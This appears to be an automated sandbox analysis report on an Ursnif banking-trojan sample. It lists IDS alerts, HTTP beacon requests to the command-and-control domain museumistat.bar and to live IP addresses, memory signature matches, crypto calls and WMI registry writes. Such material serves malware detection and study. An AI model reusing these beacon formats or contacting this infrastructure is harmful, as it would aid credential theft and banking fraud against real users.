            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49752 -> 31.41.44.3:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49754 -> 31.41.44.3:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49754 -> 31.41.44.3:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49752 -> 31.41.44.3:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49756 -> 31.41.44.3:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49756 -> 31.41.44.3:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49763 -> 62.173.145.37:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49763 -> 62.173.145.37:80
            Source: TrafficSnort IDS: 2021813 ET TROJAN Ursnif Variant CnC Beacon 192.168.2.3:49764 -> 62.173.149.135:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49764 -> 62.173.149.135:80
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3 (Ubuntu)Date: Wed, 19 Jan 2022 10:50:28 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6b(HML),I310Q/Qp/K&T$dCAfAyyyr0.a30
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3 (Ubuntu)Date: Wed, 19 Jan 2022 10:50:31 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6b(HML),I310Q/Qp/K&T$dCAfAyyyr0.a30
            Source: unknownUDP traffic detected without corresponding DNS query: 208.67.222.222
            Source: unknownUDP traffic detected without corresponding DNS query: 208.67.222.222
            Source: unknownUDP traffic detected without corresponding DNS query: 208.67.222.222
            Source: loaddll32.exe, 00000001.00000003.396945352.0000000004F58000.00000004.00000040.sdmp, regsvr32.exe, 00000004.00000003.413542435.0000000005DE8000.00000004.00000040.sdmp, rundll32.exe, 00000005.00000003.411738935.00000000064A8000.00000004.00000040.sdmp, rundll32.exe, 00000006.00000003.392202470.0000000005AB8000.00000004.00000040.sdmp, powershell.exe, 0000001C.00000003.437697839.00000205D155C000.00000004.00000040.sdmp, powershell.exe, 0000001F.00000003.438121484.0000014B5DD8C000.00000004.00000040.sdmpString found in binary or memory: http://constitution.org/usdeclar.txt
            Source: loaddll32.exe, 00000001.00000003.396945352.0000000004F58000.00000004.00000040.sdmp, regsvr32.exe, 00000004.00000003.413542435.0000000005DE8000.00000004.00000040.sdmp, rundll32.exe, 00000005.00000003.411738935.00000000064A8000.00000004.00000040.sdmp, rundll32.exe, 00000006.00000003.392202470.0000000005AB8000.00000004.00000040.sdmp, powershell.exe, 0000001C.00000003.437697839.00000205D155C000.00000004.00000040.sdmp, powershell.exe, 0000001F.00000003.438121484.0000014B5DD8C000.00000004.00000040.sdmpString found in binary or memory: http://constitution.org/usdeclar.txtC:
            Source: loaddll32.exe, 00000001.00000003.396945352.0000000004F58000.00000004.00000040.sdmp, regsvr32.exe, 00000004.00000003.413542435.0000000005DE8000.00000004.00000040.sdmp, rundll32.exe, 00000005.00000003.411738935.00000000064A8000.00000004.00000040.sdmp, rundll32.exe, 00000006.00000003.392202470.0000000005AB8000.00000004.00000040.sdmp, powershell.exe, 0000001C.00000003.437697839.00000205D155C000.00000004.00000040.sdmp, powershell.exe, 0000001F.00000003.438121484.0000014B5DD8C000.00000004.00000040.sdmpString found in binary or memory: http://https://file://USER.ID%lu.exe/upd
            Source: regsvr32.exe, 00000004.00000003.346708342.0000000002F63000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.353643418.0000000002F63000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.346671708.0000000002F63000.00000004.00000001.sdmpString found in binary or memory: http://museumistat.bar/drew/9blP_2FAE_2FFwEHiHE7/YS8VB72J_2FAJJllSzs/fyphXYY7W5oXrGE4G68BTo/K6uxe0s8
            Source: regsvr32.exe, 00000004.00000003.333637218.0000000002F52000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.333810799.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: http://museumistat.bar/drew/m4PVNjgat1g0/6_2Btp70Ci0/aungsV13kBUs5a/u2A8XHXxV0G6qtvrny9S2/1bGzk7Hyzb
            Source: unknownDNS traffic detected: queries for: museumistat.bar
            Source: global trafficHTTP traffic detected: GET /drew/wEnwCvgRr/tkjGrRWK504Gps4HB3Fh/a_2BgTA9pNLu5RTmMnf/cmF_2FoZExPeCfaavPGpw5/C4a_2B98FiRPO/vd2Nyn5c/h1bh48eCW9576sdvhYLet1i/wAsWnHJnYc/cKnuGYGL3HaarUE97/qNDbxnUrqa6o/sHAvWKK0ZF_/2FEfhnIyqYNHjo/0w_2F7ABHTCX38bGaal1i/N2IxD5P36ZAbXvHE/ihtoW7NXLZjCM45/tPYjxR5L6h/zPvdL.jlk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: museumistat.barConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: museumistat.barConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /drew/iAVgwY_2F4_2B2wf10X/FKX8zCBs2KovZS3yYcqVUR/0_2BOKZVcXEno/mLNHqO4f/FdsEVjQZNrZLxNNjyopPvLU/cfGGvFKVJ_/2Fi2PnS811OxATftg/nfhcscYxJdSk/zsHccq2aXfw/iNTGalrAEj6HyF/BYyf3V_2B8kuM2spwKkvI/q_2Bf_2F7dIejZy3/x_2FpxM8IMFGs4y/_2Blb0vaFR2hoHDVFC/Nq2TJxK8w/aDcpB_2By_2F0bU0gDru/h6N_2BG_/2Fyz6.jlk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: museumistat.barConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: museumistat.barConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /drew/wga5IeWF0fbDUBK30nf7o/j3uIOKqwUJ7BeRn9/LJzeE6KiaowWMEN/1rl19rIxVGb1taWDFn/bvY_2Bj1I/jdMAwzmFp0So0WDkYGB7/K3_2FBRRUiljGXL6kfm/xF0075RiTcM0CPYkqDi3rw/svrqsYheZV3ck/1VgFcLwV/R_2Be8zhkiZ2WSszO26Jh4p/C_2FhB5HDF/R0NzBeUEC158lMl7p/nVaFZKFRejW7/8Iglv9KSE21/tjMzYgrS/4.jlk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: museumistat.barConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /drew/m4PVNjgat1g0/6_2Btp70Ci0/aungsV13kBUs5a/u2A8XHXxV0G6qtvrny9S2/1bGzk7HyzbfK_2FU/H_2BzwQBI0CSjs2/U1xYaVr4zjQvZiLchv/4aLCBz0CM/68jv0usMkhT2JOF9ESfc/julfpSuq9tErtsl1vT0/5cBxjWFbHYxsgooRJoWIHy/X7bt5vrbFueOy/GXHEBf2y/a48Hwj5cem9DF_2FgVMHxJc/2BxgNa1_2B/9wP6Mz_2F/66hqNdd.jlk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: museumistat.barConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /drew/zlj4U_2BpF/PFbRjIXiIkOSi8ZuS/gT16WYYiNgoB/9_2B2YxIbZB/GHzyVS_2FCpsZN/30zlWVPVZ1aQWCtoYb1cC/_2FKspT3tLM9jLiA/xGf6rlGahWPj7RL/bfghSuOahu_2Bt2kSL/ri7zS6oyT/3ly7ZC_2BZPzSyH_2FWj/iCG_2FcAdsetgeAR3BK/QVbQCXUdBOX1dHgfCEoJo_/2BiGNBBkCFAf9/x7loptWl/faRjCGMaWc9_2F6NZdJ2zIg/fwEDm60.jlk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: museumistat.barConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /drew/1_2Ff_2F9oFy50B/NUoWO_2FDz5xIg76q9/VveqFFcWO/HyFzcq3OFY_2BhIPCNw9/sIpk4tVFJ9VOtR2TNQU/et11cPI71f_2FqTVA64vkQ/ypIbEDHfIxxsr/MyPGmlo5/aegiD19qzpHWbW06aGHN_2F/zeC5Le5Fpu/swEVOnWdXMP11BFlG/5EITeJo9mr75/6dBXeBOslAr/PXd6axM5Td1aIF/iXDTVhWGdUnCVcgEXpRpk/4zChmYsnqrQ_2F/X48.jlk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: museumistat.barConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /drew/WscgLp0a9mza4KVSZP_2F/qW_2BiGKRm2pEjNT/0yit17kTcYKALfY/Dca3d6njS6Q8Up7_2B/S1Q5c3m1L/htfRX_2FNP4zOUbJdHE0/XcLw_2FUradRuvSZYkz/0N0BHZth_2BNigSkIsxFbw/Kr0gcIwYitNQb/vtve9mnb/uJ6GCaAgncMj3aalqD8JgFA/MTnXx5EVkL/iZOp4aPFrTK2CzYfp/vJg2ovriq7si/LWFvH6yBaQn/MYMUZGLdg/H3Ww.jlk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: museumistat.barConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /drew/ml7QN9H69bQc_2FqcErn/JWHN_2F1D_2FeQ7F2rf/oeEjPxzB_2Fw_2F8MEJzC6/5gAnzEpRNXWFk/64j4iITJ/jnOThCTb9WelDC2Av_2F9i8/VHepa0UCDh/KFl9Z1ZbYspbJ4E8_/2BzgcxaTppah/d9hJDFKgAt8/5U8WBthgJgfyxM/8RFDoFNHkI_2FZphi7QxP/YaWR2kATqPAKO_2B/PJwm2MPaqbbSQg_/2BLvMKsgjJPPYLJl45/I0CzZhv6_2FCZxS/FG1.jlk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: museumistat.barConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /drew/DZcSXh7Ng_2FsV0UJ_2F3/GRst_2FHsmEUpTdn/IlRoWuXOQz6AvVB/oHCRIZwCXdu19fzTF6/IJnk9pqyt/R7YThfxVvXjPoTFVxdIp/9ZSBIRr8aNwCdcqsbSD/ubGl_2FCIQSLMzyQKYuoWo/1iFBN06iwUsUZ/fYXG9Rb_/2BfTgXtLPmMRPeRvowhbSh5/36HMJRHO8b/OSGBdiiAUHsyPYUFc/lxohA008GtqJ/Nc8_2BFhn82/lm9LjrPDHsuz/X.jlk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: museumistat.barConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /drew/9blP_2FAE_2FFwEHiHE7/YS8VB72J_2FAJJllSzs/fyphXYY7W5oXrGE4G68BTo/K6uxe0s8owaZT/sJxgOiGF/toQb9bzuaSQoxlM767HxEUz/ojykuv_2Fm/zAlx3F69HisyQxGCo/YrZLBqFxHDh8/rWHutgpt4HV/9AGOgb99_2BjD6/GPBMSBdUStdt1oIDAqsXJ/Zv_2BHFepXyMKGeg/AYLFYPerTsZQFJf/UksyhZMrYb3d23pSok/_2BcgBxCR/B.jlk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: museumistat.barConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /drew/2Ghwj5VMTy/n0fnHab4HU0c0skVA/H18bJ5bl99Je/rqcYKjw2LjF/oo3IrxIrGawPDh/WY3GQdM2gSEeA7t2qCkIS/1aubp3gxSiryQwCt/uHpd4lSUp2YM4rr/8xTqKKzowmzwk_2FmS/XK1nPBS4G/Dq2A1gKI6_2BPykbobVi/Bx98dtZc4Ves6LJvXCA/8pS6Ds7iy1MLmIYsX5uHS_/2BoRknJx2A5IW/_2BhddqS/olB0zaEdsk_2Fal/9PLaB.jlk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: museumistat.barConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /drew/VV_2BwS8Vr7FLZE_2Bx/hn00HRykakafUORzXuronm/S2NceGwHyG0lw/75DrHXVA/R1_2F_2Fj4Y_2FxlTCM7oLQ/KdAvtV7PTd/INtjv0kJxFO5LBByA/6IEADuWC8M_2/BC2pEweOA_2/FLFj0zJxXN5f0_/2FXT1i0K56I9LZMvALSyv/P7hw8vY32OG3jn28/BOFJl0FutRVUckU/Qu6XnvXUiNRUBGVYb6/29y_2F1_2/FgyW49mKvtH4XdHIh58L/Va1en8p.jlk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: museumistat.barConnection: Keep-Alive

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000006.00000003.330162595.0000000004ABC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.392202470.0000000005AB8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.411738935.00000000064A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.338066734.00000000038AC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.349294200.000000000536C000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000003.437697839.00000205D155C000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.349136332.000000000536C000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.330265188.0000000004ABC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.343128725.0000000005568000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.339561457.00000000050BC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.338125787.00000000038AC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.338174961.00000000038AC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000003.438121484.0000014B5DD8C000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.413542435.0000000005DE8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.338136102.00000000038AC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.349238253.000000000536C000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.333735051.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.330104762.0000000004ABC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.330149161.0000000004ABC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.339592221.00000000050BC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.349114643.000000000536C000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.339580367.00000000050BC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.396945352.0000000004F58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.349219356.000000000536C000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.338105591.00000000038AC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.323045956.0000000004CB8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.339543632.00000000050BC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.334273561.00000000052B8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.330131368.0000000004ABC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.339627226.00000000050BC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 5624, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 2944, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5268, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5784, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5008, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6944, type: MEMORYSTR

            E-Banking Fraud:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000006.00000003.330162595.0000000004ABC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.392202470.0000000005AB8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.411738935.00000000064A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.338066734.00000000038AC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.349294200.000000000536C000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000003.437697839.00000205D155C000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.349136332.000000000536C000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.330265188.0000000004ABC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.343128725.0000000005568000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.339561457.00000000050BC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.338125787.00000000038AC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.338174961.00000000038AC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000003.438121484.0000014B5DD8C000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.413542435.0000000005DE8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.338136102.00000000038AC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.349238253.000000000536C000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.333735051.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.330104762.0000000004ABC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.330149161.0000000004ABC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.339592221.00000000050BC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.349114643.000000000536C000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.339580367.00000000050BC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.396945352.0000000004F58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.349219356.000000000536C000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.338105591.00000000038AC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.323045956.0000000004CB8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.339543632.00000000050BC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.334273561.00000000052B8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.330131368.0000000004ABC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.339627226.00000000050BC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 5624, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 2944, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5268, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5784, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5008, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6944, type: MEMORYSTR
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_017D4872 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_02D44872 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04AA4872 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00AC4872 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,

            System Summary:

            barindex
            Writes or reads registry keys via WMIShow sources
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Writes registry values via WMIShow sources
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
